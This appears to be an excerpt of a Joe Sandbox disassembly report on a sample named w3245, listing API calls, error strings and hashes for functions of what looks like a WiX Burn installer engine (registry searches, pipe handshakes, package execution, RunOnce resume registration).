                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
                                                                                                                                                                    • String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$crypt32.dll$pipe.cpp
                                                                                                                                                                    • API String ID: 2944378912-2047837012
                                                                                                                                                                    • Opcode ID: a5a6be4bb4aefaf839935c2a158a7e57274f48fa23194f656c4e7d8cb9b911b0
                                                                                                                                                                    • Instruction ID: 7f73a3eb6ec465e5708569cb832a3917ca7cd5cf3d2d428191987280cc7ddd71
                                                                                                                                                                    • Opcode Fuzzy Hash: a5a6be4bb4aefaf839935c2a158a7e57274f48fa23194f656c4e7d8cb9b911b0
                                                                                                                                                                    • Instruction Fuzzy Hash: 7771B776E50629EBD720DAA58C4AFEE66ACAF84B55F134525BD00FB1C0E774CD8087E0
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 0090A45A
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 0090A480
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?,?,?), ref: 0090A768
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to clear variable., xrefs: 0090A4D8
                                                                                                                                                                    • Failed to open registry key., xrefs: 0090A4ED
                                                                                                                                                                    • Failed to format key string., xrefs: 0090A465
                                                                                                                                                                    • Failed to query registry key value size., xrefs: 0090A554
                                                                                                                                                                    • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0090A51C
                                                                                                                                                                    • Failed to format value string., xrefs: 0090A48B
                                                                                                                                                                    • Failed to read registry value., xrefs: 0090A6F6
                                                                                                                                                                    • Unsupported registry key value type. Type = '%u', xrefs: 0090A608
                                                                                                                                                                    • search.cpp, xrefs: 0090A54A, 0090A57D, 0090A5D0, 0090A6D3
                                                                                                                                                                    • Failed to set variable., xrefs: 0090A72B
                                                                                                                                                                    • Failed to query registry key value., xrefs: 0090A5DA
                                                                                                                                                                    • Failed to allocate memory registry value., xrefs: 0090A587
                                                                                                                                                                    • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 0090A740
                                                                                                                                                                    • Registry key not found. Key = '%ls', xrefs: 0090A4B4
                                                                                                                                                                    • Failed to get expand environment string., xrefs: 0090A6DD
                                                                                                                                                                    • Failed to change value type., xrefs: 0090A70F
                                                                                                                                                                    • Failed to allocate string buffer., xrefs: 0090A667
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open@16$Close
                                                                                                                                                                    • String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$search.cpp
                                                                                                                                                                    • API String ID: 2348241696-3124384294
                                                                                                                                                                    • Opcode ID: 4baa23e506b7c92741f598a1726735006aeef7ca380f8561c7702166bc2891cc
                                                                                                                                                                    • Instruction ID: 8be1f0f76f4e209f6b81634eb2b72db90f5ba504de25d752635176f0fe024c01
                                                                                                                                                                    • Opcode Fuzzy Hash: 4baa23e506b7c92741f598a1726735006aeef7ca380f8561c7702166bc2891cc
                                                                                                                                                                    • Instruction Fuzzy Hash: 9EA1AF73D40329BFCB229AA4CC45EAEBA78BF48710F158561F910BA1D1D7759E00ABD2
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000100,00000100,00000100,00000000,00000000,00000000,?,0090A8B4,00000100,000002C0,000002C0,00000100), ref: 00905795
                                                                                                                                                                    • lstrlenW.KERNEL32(000002C0,?,0090A8B4,00000100,000002C0,000002C0,00000100), ref: 0090579F
                                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 009059A7
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000100,00000000,000002C0,000002C0,00000000,000002C0,00000001,?,0090A8B4,00000100,000002C0,000002C0,00000100), ref: 00905C4A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave_wcschrlstrlen
                                                                                                                                                                    • String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,0092D558,?,?,?), ref: 0092CEC7
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0092D558,?,?,?), ref: 0092CED4
                                                                                                                                                                    • ReleaseMutex.KERNEL32(?), ref: 0092D13C
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
                                                                                                                                                                    • String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 009432F3: VariantInit.OLEAUT32(?), ref: 00943309
                                                                                                                                                                      • Part of subcall function 009432F3: SysAllocString.OLEAUT32(?), ref: 00943325
                                                                                                                                                                      • Part of subcall function 009432F3: VariantClear.OLEAUT32(?), ref: 009433AC
                                                                                                                                                                      • Part of subcall function 009432F3: SysFreeString.OLEAUT32(00000000), ref: 009433B7
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,Detect,000000FF,?,0094CA9C,?,?,Action,?,?,?,00000000,00905445), ref: 0090EB13
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF), ref: 0090EB5D
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to resize Addon code array in registration, xrefs: 0090EC3C
                                                                                                                                                                    • Invalid value for @Action: %ls, xrefs: 0090EC52
                                                                                                                                                                    • Upgrade, xrefs: 0090EB50
                                                                                                                                                                    • Failed to get @Action., xrefs: 0090EC69
                                                                                                                                                                    • Failed to resize Patch code array in registration, xrefs: 0090EC43
                                                                                                                                                                    • Addon, xrefs: 0090EB9A
                                                                                                                                                                    • Detect, xrefs: 0090EB04
                                                                                                                                                                    • RelatedBundle, xrefs: 0090EA50
                                                                                                                                                                    • Failed to resize Upgrade code array in registration, xrefs: 0090EC35
                                                                                                                                                                    • Failed to get RelatedBundle element count., xrefs: 0090EA97
                                                                                                                                                                    • Failed to get RelatedBundle nodes, xrefs: 0090EA72
                                                                                                                                                                    • Failed to get @Id., xrefs: 0090EC62
                                                                                                                                                                    • comres.dll, xrefs: 0090EB26
                                                                                                                                                                    • version.dll, xrefs: 0090EB70
                                                                                                                                                                    • Failed to get next RelatedBundle element., xrefs: 0090EC70
                                                                                                                                                                    • Failed to resize Detect code array in registration, xrefs: 0090EC2E
                                                                                                                                                                    • Action, xrefs: 0090EAD0
                                                                                                                                                                    • Patch, xrefs: 0090EBDD
                                                                                                                                                                    • cabinet.dll, xrefs: 0090EBBA
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$CompareVariant$AllocClearFreeInit
                                                                                                                                                                    • String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$cabinet.dll$comres.dll$version.dll
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,8000FFFF,feclient.dll,?,00914BF5,0094B4E8,?,feclient.dll,00000000,?,?), ref: 009146F3
                                                                                                                                                                    • ReadFile.KERNEL32(feclient.dll,feclient.dll,00000004,?,00000000,?,00914BF5,0094B4E8,?,feclient.dll,00000000,?,?), ref: 00914714
                                                                                                                                                                    • GetLastError.KERNEL32(?,00914BF5,0094B4E8,?,feclient.dll,00000000,?,?), ref: 0091471A
                                                                                                                                                                    • ReadFile.KERNEL32(feclient.dll,00000000,0094B518,?,00000000,00000000,0094B519,?,00914BF5,0094B4E8,?,feclient.dll,00000000,?,?), ref: 009147A8
                                                                                                                                                                    • GetLastError.KERNEL32(?,00914BF5,0094B4E8,?,feclient.dll,00000000,?,?), ref: 009147AE
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastRead$CurrentProcess
                                                                                                                                                                    • String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Failed to read verification secret from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$feclient.dll$msasn1.dll$pipe.cpp
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                    • String ID: DetectCondition$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$UninstallArguments$burn$netfx4$none
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStringTypeW.KERNEL32(00000001,560094DB,00000001,?,00909946,?,00000000,00000000,?,?,0090992E,?,?,00000000,?), ref: 00908FB2
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d., xrefs: 009091DE
                                                                                                                                                                    • NOT, xrefs: 009092DB
                                                                                                                                                                    • Failed to set symbol value., xrefs: 00909060
                                                                                                                                                                    • Failed to parse condition "%ls". Unexpected '~' operator at position %d., xrefs: 00909408
                                                                                                                                                                    • Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d., xrefs: 009093C4
                                                                                                                                                                    • Failed to parse condition "%ls". Constant too big, at position %d., xrefs: 00909380
                                                                                                                                                                    • Failed to parse condition "%ls". Unexpected character at position %d., xrefs: 00909162
                                                                                                                                                                    • Failed to parse condition "%ls". Unterminated literal at position %d., xrefs: 00909098
                                                                                                                                                                    • Failed to parse condition "%ls". Invalid version format, at position %d., xrefs: 00909242
                                                                                                                                                                    • AND, xrefs: 009092BC
                                                                                                                                                                    • -, xrefs: 00909118
                                                                                                                                                                    • condition.cpp, xrefs: 00909084, 0090914E, 009091CA, 0090922E, 0090936C, 009093B0, 009093F4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: StringType
                                                                                                                                                                    • String ID: -$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,success,000000FF,?,Type,00000000,?,?,00000000,?,00000001,?), ref: 00921CB8
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,error,000000FF), ref: 00921CD6
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareHeapString$AllocateProcess
                                                                                                                                                                    • String ID: Code$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @Type.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$Invalid exit code type: %ls$Type$error$exeengine.cpp$forceReboot$scheduleReboot$success
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,rel,000000FF,?,?,?,00000000), ref: 00947857
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,href,000000FF), ref: 0094787C
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,length,000000FF), ref: 0094789C
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 009478CF
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,type,000000FF), ref: 009478EB
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00947916
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0094798D
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 009479D9
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Compare$Free
                                                                                                                                                                    • String ID: `<u$comres.dll$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090D4A8: EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,00917040,000000B8,00000000,?,00000000,75C0B390), ref: 0090D4B7
                                                                                                                                                                      • Part of subcall function 0090D4A8: InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0090D4C6
                                                                                                                                                                      • Part of subcall function 0090D4A8: LeaveCriticalSection.KERNEL32(000000D0,?,00917040,000000B8,00000000,?,00000000,75C0B390), ref: 0090D4DB
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,009157BD,?,00000000,00000000), ref: 00916E34
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00904522,?,0094B500,?,00904846,?,?), ref: 00916E43
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00904522,?,0094B500,?,00904846,?,?), ref: 00916EA0
                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000000), ref: 00916F92
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00916F9B
                                                                                                                                                                    • CloseHandle.KERNEL32(crypt32.dll,?,00000000,?,00000000,00000001,00000000), ref: 00916FB5
                                                                                                                                                                      • Part of subcall function 0092BD05: SetThreadExecutionState.KERNEL32(80000001), ref: 0092BD0A
                                                                                                                                                                    Strings
                                                                                                                                                                    • crypt32.dll, xrefs: 00916ECD, 00916EE7, 00916FB4
                                                                                                                                                                    • core.cpp, xrefs: 00916C8A, 00916E67
                                                                                                                                                                    • Another per-machine setup is already executing., xrefs: 00916DC8
                                                                                                                                                                    • Another per-user setup is already executing., xrefs: 00916CD8
                                                                                                                                                                    • Failed to elevate., xrefs: 00916D94
                                                                                                                                                                    • Failed to cache engine to working directory., xrefs: 00916D71
                                                                                                                                                                    • Failed to set initial apply variables., xrefs: 00916D02
                                                                                                                                                                    • UX aborted apply begin., xrefs: 00916C94
                                                                                                                                                                    • Failed to create cache thread., xrefs: 00916E71
                                                                                                                                                                    • Failed to register bundle., xrefs: 00916DEE
                                                                                                                                                                    • Failed while caching, aborting execution., xrefs: 00916E98
                                                                                                                                                                    • Engine cannot start apply because it is busy with another action., xrefs: 00916C28
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle$CriticalSectionThread$CompareCreateEnterErrorExchangeExecutionInterlockedLastLeaveMutexReleaseState
                                                                                                                                                                    • String ID: Another per-machine setup is already executing.$Another per-user setup is already executing.$Engine cannot start apply because it is busy with another action.$Failed to cache engine to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp$crypt32.dll
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,00000410), ref: 00948161
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 0094817C
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 0094821F
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,000002D8,0094B518,00000000), ref: 0094825E
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 009482B1
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,0094B518,000000FF,true,000000FF), ref: 009482CF
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 00948307
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 0094844B
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString
                                                                                                                                                                    • String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
                                                                                                                                                                    • API String ID: 1825529933-3037633208
                                                                                                                                                                    • Opcode ID: 216468c6a53b98d43d107d0804cc11ae26c6f081c5e5c2023a93140df26013ab
                                                                                                                                                                    • Instruction ID: 01d1a115477e838674cfe9116805cf827c81dd504c0c64422f9d60f9f108e8bb
                                                                                                                                                                    • Opcode Fuzzy Hash: 216468c6a53b98d43d107d0804cc11ae26c6f081c5e5c2023a93140df26013ab
                                                                                                                                                                    • Instruction Fuzzy Hash: 09B18E31608606AFDB619F98CC85F5F77AAAB44734F214659F935EB2E1DB70E841CB00
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0091E2AF: LoadBitmapW.USER32(?,00000001), ref: 0091E2E5
                                                                                                                                                                      • Part of subcall function 0091E2AF: GetLastError.KERNEL32 ref: 0091E2F1
                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0091E429
                                                                                                                                                                    • RegisterClassW.USER32(?), ref: 0091E43D
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091E448
                                                                                                                                                                    • UnregisterClassW.USER32(WixBurnSplashScreen,?), ref: 0091E54D
                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0091E55C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ClassErrorLastLoad$BitmapCursorDeleteObjectRegisterUnregister
                                                                                                                                                                    • String ID: Failed to create window.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$splashscreen.cpp
                                                                                                                                                                    • API String ID: 164797020-2188509422
                                                                                                                                                                    • Opcode ID: 13d4b8cb24d18b472c3e7df5e6b29974fb6679edfa336a7ff2d74f77aa1f3138
                                                                                                                                                                    • Instruction ID: df012249b76647879806f71da0bd021b2776901cd605ce29e62c464b57d97036
                                                                                                                                                                    • Opcode Fuzzy Hash: 13d4b8cb24d18b472c3e7df5e6b29974fb6679edfa336a7ff2d74f77aa1f3138
                                                                                                                                                                    • Instruction Fuzzy Hash: C241BE76A04219BFEB119BE5DC08EEEBBB9FF08715F100125FE01A61A0E7709D449BA1
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,00000000,?,0092BC85,00000001), ref: 00929E46
                                                                                                                                                                    • GetLastError.KERNEL32(?,0092BC85,00000001), ref: 00929FB6
                                                                                                                                                                    • GetExitCodeThread.KERNEL32(00000001,00000000,?,0092BC85,00000001), ref: 00929FF6
                                                                                                                                                                    • GetLastError.KERNEL32(?,0092BC85,00000001), ref: 0092A000
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to execute MSP package., xrefs: 00929ECB
                                                                                                                                                                    • Failed to execute compatible package action., xrefs: 00929F73
                                                                                                                                                                    • apply.cpp, xrefs: 00929FDD, 0092A027
                                                                                                                                                                    • Failed to execute MSU package., xrefs: 00929EFB
                                                                                                                                                                    • Failed to execute package provider registration action., xrefs: 00929F17
                                                                                                                                                                    • Cache thread exited unexpectedly., xrefs: 0092A047
                                                                                                                                                                    • Failed to wait for cache check-point., xrefs: 00929FE7
                                                                                                                                                                    • Invalid execute action., xrefs: 0092A056
                                                                                                                                                                    • Failed to execute dependency action., xrefs: 00929F36
                                                                                                                                                                    • Failed to get cache thread exit code., xrefs: 0092A031
                                                                                                                                                                    • Failed to execute EXE package., xrefs: 00929E7D
                                                                                                                                                                    • Failed to execute MSI package., xrefs: 00929EA6
                                                                                                                                                                    • Failed to load compatible package on per-machine package., xrefs: 00929F5C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
                                                                                                                                                                    • String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
                                                                                                                                                                    • API String ID: 3703294532-2662572847
                                                                                                                                                                    • Opcode ID: f46f8b740a37130e6c0ab828a676bae27f0bf03991821de69bbda535ca16e043
                                                                                                                                                                    • Instruction ID: 596162684ff1692ff1f13fdb628ceb84346ff246563b688385dbb8f658a6c5c5
                                                                                                                                                                    • Opcode Fuzzy Hash: f46f8b740a37130e6c0ab828a676bae27f0bf03991821de69bbda535ca16e043
                                                                                                                                                                    • Instruction Fuzzy Hash: 46719D71A41229EFDB10DFA5E901EBE7BB8FB85B10F11416AFD01EB244D3749E009BA1
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00943AF1: GetVersionExW.KERNEL32(?,?,00000000,?), ref: 00943B3E
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,00950D10,00020006,00000000,?,00000000,00000000,00000000,?,00000000,00000001,00000000,00000000), ref: 0090F440
                                                                                                                                                                      • Part of subcall function 009414A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,0090F28D,00950D10,Resume,00000005,?,00000000,00000000,00000000), ref: 009414BB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseValueVersion
                                                                                                                                                                    • String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$burn.runonce$registration.cpp
